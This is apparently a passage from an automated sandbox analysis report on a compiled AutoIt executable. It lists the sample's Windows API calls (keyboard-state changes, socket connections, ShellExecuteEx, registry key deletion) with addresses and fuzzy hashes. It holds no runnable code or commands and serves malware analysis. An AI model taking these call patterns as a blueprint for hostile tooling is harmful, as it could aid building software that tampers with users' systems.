                                                • Opcode Fuzzy Hash: d134b74e6ee0d46b2a5fb4f6f11a6444e8d3e8f3c2aa0be94eca7f8b20a85a78
                                                • Instruction Fuzzy Hash: 39715D30900149EFCF14CF98CC89ABEBB79FF86350F54C159F919AA251C738AA51CBA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9a6ad606fbc078107d70e45293a73c55ef9e535643f16a6c747d71805de9a35
                                                • Instruction ID: fa3ea4f0b694beaa1aad7662559004a556a8c4241ed09b60478bdd3500f4846f
                                                • Opcode Fuzzy Hash: c9a6ad606fbc078107d70e45293a73c55ef9e535643f16a6c747d71805de9a35
                                                • Instruction Fuzzy Hash: 1F61C071504340EBCB10EB25CC89E6FB7E9EF98794F10891CF559972A2DB78AD00C792
                                                APIs
                                                • IsWindow.USER32(01204888), ref: 007FB41F
                                                • IsWindowEnabled.USER32(01204888), ref: 007FB42B
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FB50F
                                                • SendMessageW.USER32(01204888,000000B0,?,?), ref: 007FB546
                                                • IsDlgButtonChecked.USER32(?,?), ref: 007FB583
                                                • GetWindowLongW.USER32(01204888,000000EC), ref: 007FB5A5
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FB5BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 4089623dce85043e0b4ad93677b6181dff964f9995a490e1ad3932fa45405014
                                                • Instruction ID: ef35434961d11cf071bdc1298f410a0df112dfdadcdc5032fc0b82d8ca9d5c5d
                                                • Opcode Fuzzy Hash: 4089623dce85043e0b4ad93677b6181dff964f9995a490e1ad3932fa45405014
                                                • Instruction Fuzzy Hash: F971DF34605248EFDB209FA4C994FBA7BB9FF49300F144069FA55973A2CB39AC54CB51
                                                APIs
                                                • _memset.LIBCMT ref: 007EF55C
                                                • _memset.LIBCMT ref: 007EF625
                                                • ShellExecuteExW.SHELL32(?), ref: 007EF66A
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • GetProcessId.KERNEL32(00000000), ref: 007EF6E1
                                                • CloseHandle.KERNEL32(00000000), ref: 007EF710
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: d9d08d9ec380f263be062bcba6ea25ea24c18fb25418e31ef50095ade98e9549
                                                • Instruction ID: 53bd57d6b2464a97897ba7b80f108819f9084ea9025a7376050a94eba066b427
                                                • Opcode Fuzzy Hash: d9d08d9ec380f263be062bcba6ea25ea24c18fb25418e31ef50095ade98e9549
                                                • Instruction Fuzzy Hash: 2D619D75A01619DFCF14EF65C8849ADBBB5FF88310B148469E84AAB761DB38AD40CB90
                                                APIs
                                                • GetParent.USER32(?), ref: 007D12BD
                                                • GetKeyboardState.USER32(?), ref: 007D12D2
                                                • SetKeyboardState.USER32(?), ref: 007D1333
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 007D1361
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 007D1380
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 007D13C6
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D13E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
                                                • Instruction ID: e9cc80bc46a305f5b91c4bdbfebef90659ac71b00135f55c46644cadf509a350
                                                • Opcode Fuzzy Hash: 9d9ef461a67a316de086c50f57335a8a95e0510f3500c7d3bab1d221a136e822
                                                • Instruction Fuzzy Hash: 7251E3A0A087D17EFB3646348C45BBA7EB96F06304F88858AE0D596AC2C6DDECD4D750
                                                APIs
                                                • GetParent.USER32(00000000), ref: 007D10D6
                                                • GetKeyboardState.USER32(?), ref: 007D10EB
                                                • SetKeyboardState.USER32(?), ref: 007D114C
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1178
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1195
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D11D9
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D11FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
                                                • Instruction ID: 145de9c7014661dc259ec0b5aa0cb37fbe0ca2444c4294784232a1d72f452719
                                                • Opcode Fuzzy Hash: ebbff8921978b4261c91d2d26cf11770e343eaf073c6a9f3e5c2cad698324380
                                                • Instruction Fuzzy Hash: 08512BA06447DA3DFB3283348C45B767FB96F06300F48858BE1D5466C2D69EEC94D750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: 91662a139667cfeb7a3d039ea828d5f641f9ccaec4cd2af161e7e6a0d05d2a9f
                                                • Instruction ID: 706ca2e996731d715d649d64bdc9a645582ea7e0b18f9dd4ac8763621df9adfd
                                                • Opcode Fuzzy Hash: 91662a139667cfeb7a3d039ea828d5f641f9ccaec4cd2af161e7e6a0d05d2a9f
                                                • Instruction Fuzzy Hash: 954151A5D20514B6CF11FBB4AC8A9DF77BCAF05310F508466E518E3222E6389755C3A6
                                                APIs
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D36DB,?), ref: 007D46CC
                                                  • Part of subcall function 007D46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D36DB,?), ref: 007D46E5
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D36FB
                                                • _wcscmp.LIBCMT ref: 007D3717
                                                • MoveFileW.KERNEL32(?,?), ref: 007D372F
                                                • _wcscat.LIBCMT ref: 007D3777
                                                • SHFileOperationW.SHELL32(?), ref: 007D37E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                • Opcode ID: 8d55a50ab4b3661881d6cc1b404c7ecae743acfeb03af99c8686c0d940ab90ed
                                                • Instruction ID: bd0b0fdb7e79d3b3ada441cafa35b415cced066ca05d11199fda7d29bd28f639
                                                • Opcode Fuzzy Hash: 8d55a50ab4b3661881d6cc1b404c7ecae743acfeb03af99c8686c0d940ab90ed
                                                • Instruction Fuzzy Hash: 63418FB2508345AACB51EB64D485ADBB7F8EF88350F04492FB49AC3251EA38D648C756
                                                APIs
                                                • _memset.LIBCMT ref: 007F72DC
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7383
                                                • IsMenu.USER32(?), ref: 007F739B
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F73E3
                                                • DrawMenuBar.USER32 ref: 007F73F6
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                • Opcode ID: 1d03d2dae026fc439153432cdbf0d91372c4a6a14696bf120d2359e1e3607c23
                                                • Instruction ID: ff7d7370568f72d4dc874040aab9415a98f4710cec9fd1c40353f8085873cf07
                                                • Opcode Fuzzy Hash: 1d03d2dae026fc439153432cdbf0d91372c4a6a14696bf120d2359e1e3607c23
                                                • Instruction Fuzzy Hash: 71411575A04249EFDB24DF54D884AAABBF9FF08315F048029EE1597360D734AD51DBA0
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F105C
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F1086
                                                • FreeLibrary.KERNEL32(00000000), ref: 007F113D
                                                  • Part of subcall function 007F102D: RegCloseKey.ADVAPI32(?), ref: 007F10A3
                                                  • Part of subcall function 007F102D: FreeLibrary.KERNEL32(?), ref: 007F10F5
                                                  • Part of subcall function 007F102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F1118
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007F10E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: 305a0af7da02c2bf317d4a20d8ee7c28a22dffc39adcbd0bfe74cfbfe6ae9c14
                                                • Instruction ID: ad576fa49e1c4b38dcd1b3160bc48f9b4b8dbe2fd52b0ba6fac8855611a28ff5
                                                • Opcode Fuzzy Hash: 305a0af7da02c2bf317d4a20d8ee7c28a22dffc39adcbd0bfe74cfbfe6ae9c14
                                                • Instruction Fuzzy Hash: 023138B190110DFFDB149B90DC89AFEB7BCEF08310F4041A9E601A2241EA789E859BA4
                                                APIs
                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F631E
                                                • GetWindowLongW.USER32(01204888,000000F0), ref: 007F6351
                                                • GetWindowLongW.USER32(01204888,000000F0), ref: 007F6386
                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F63B8
                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F63E2
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F63F3
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
                                                • Instruction ID: 3a962ec47f52dd1f7eb5fdea946842aad3a6d5f0d77fe2b23fae92f003243555
                                                • Opcode Fuzzy Hash: 6db60183bf77b3e0d4e922a27ea007f111bcda50b0cc141c1de4adba4527211b
                                                • Instruction Fuzzy Hash: 4731BF35604258EFDB218F18DC85F6537E1FF8A710F1941A4F611CB2B2CB6AA840DB55
                                                APIs
                                                  • Part of subcall function 007E7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E7ECB
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E62DC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E62EB
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E6324
                                                • connect.WSOCK32(00000000,?,00000010), ref: 007E632D
                                                • WSAGetLastError.WSOCK32 ref: 007E6337
                                                • closesocket.WSOCK32(00000000), ref: 007E6360
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E6379
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                • Opcode ID: eec3923a2b1a0632ad3d81041e1375d9e8055b5e0b35f80e771ac90445a665bc
                                                • Instruction ID: 2114358c49c0546c35cd6d157eacdac26ae95e45c75e7e6a4f36f365c21f3400
                                                • Opcode Fuzzy Hash: eec3923a2b1a0632ad3d81041e1375d9e8055b5e0b35f80e771ac90445a665bc
                                                • Instruction Fuzzy Hash: 0631A731601118AFDF10AF65CC89BBE7BBDEF587A4F048069FA0597291DB78AC04CB61
                                                APIs
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 35d1d005cd65958377a536512bb439770421afa2f333507da8fc41ae13093993
                                                • Instruction ID: 3ef6d98ee4bf7eafd615a42565acb947e2660f9de3783e02806a795a109b49b0
                                                • Opcode Fuzzy Hash: 35d1d005cd65958377a536512bb439770421afa2f333507da8fc41ae13093993
                                                • Instruction Fuzzy Hash: 6D213132108511B6DA35FA259C0AFBBB3D9EF56314F50803DF88AC6181EBADAD52C395
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7664
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7671
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F767C
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F768B
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7697
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: 0cc5b308071b9a94bdacc63b02c3c806cbdb48b89be917e6b21c2bfa90e14767
                                                • Instruction ID: 8d9eb9f7cee70431f0e104394b34ec6758de62a4b94748caaf33300d58a87f80
                                                • Opcode Fuzzy Hash: 0cc5b308071b9a94bdacc63b02c3c806cbdb48b89be917e6b21c2bfa90e14767
                                                • Instruction Fuzzy Hash: BB118EB211021DBEEF159E64CC85EF77F6DEF08798F014115BB08A2190CA76AC21DBA4
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00799C66
                                                  • Part of subcall function 00793307: EncodePointer.KERNEL32(00000000), ref: 0079330A
                                                  • Part of subcall function 00793307: __initp_misc_winsig.LIBCMT ref: 00793325
                                                  • Part of subcall function 00793307: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0079A020
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0079A034
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0079A047
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0079A05A
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0079A06D
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0079A080
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0079A093
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0079A0A6
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0079A0B9
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0079A0CC
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0079A0DF
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0079A0F2
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0079A105
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0079A118
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0079A12B
                                                  • Part of subcall function 00793307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0079A13E
                                                • __mtinitlocks.LIBCMT ref: 00799C6B
                                                • __mtterm.LIBCMT ref: 00799C74
                                                  • Part of subcall function 00799CDC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00799C79,00797E4D,0082A0B8,00000014), ref: 00799DD6
                                                  • Part of subcall function 00799CDC: _free.LIBCMT ref: 00799DDD
                                                  • Part of subcall function 00799CDC: DeleteCriticalSection.KERNEL32(0082EC00,?,?,00799C79,00797E4D,0082A0B8,00000014), ref: 00799DFF
                                                • __calloc_crt.LIBCMT ref: 00799C99
                                                • __initptd.LIBCMT ref: 00799CBB
                                                • GetCurrentThreadId.KERNEL32 ref: 00799CC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 3567560977-0
                                                • Opcode ID: 4ddffe4176015572f5a507f2108a6acce1a1a1bfb55b672bf01c2fffbee169c7
                                                • Instruction ID: 5e3f4a331324933446d3ecf3ab30f801a9c835a595bc0f2b482d8c8fbcd57c7f
                                                • Opcode Fuzzy Hash: 4ddffe4176015572f5a507f2108a6acce1a1a1bfb55b672bf01c2fffbee169c7
                                                • Instruction Fuzzy Hash: 01F0F032149B1299FE74773CBC0B64A2AC5EF02731F20061EFA64C81D2EF2DC4814274
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,007941D2,?), ref: 00794123
                                                • GetProcAddress.KERNEL32(00000000), ref: 0079412A
                                                • EncodePointer.KERNEL32(00000000), ref: 00794136
                                                • DecodePointer.KERNEL32(00000001,007941D2,?), ref: 00794153
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: 92d4be7555aebb4b55a74ef59992885861d4fc1f0fcc229d017ed70a3c75b890
                                                • Instruction ID: af37e94e89c96e69a321d0bab08b28c7e47c34b29f27111ee60a524d4917c6b8
                                                • Opcode Fuzzy Hash: 92d4be7555aebb4b55a74ef59992885861d4fc1f0fcc229d017ed70a3c75b890
                                                • Instruction Fuzzy Hash: F2E0EE70690348AAEF106B70EC4DB283AA4BB96B02F108824F811E61E0DBF98581DA08
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007940F8), ref: 007941F8
                                                • GetProcAddress.KERNEL32(00000000), ref: 007941FF
